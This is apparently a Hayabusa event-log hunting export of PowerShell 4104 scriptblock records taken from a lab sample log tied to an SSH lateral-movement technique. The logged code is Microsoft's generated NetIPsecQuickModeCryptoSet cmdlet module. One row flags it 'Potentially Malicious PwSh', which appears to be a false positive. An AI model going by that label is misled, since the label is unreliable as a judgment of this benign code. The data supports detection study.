[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', 
$__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -con",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] 
[ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] 
[Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; 
ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } 
catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"tains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' 
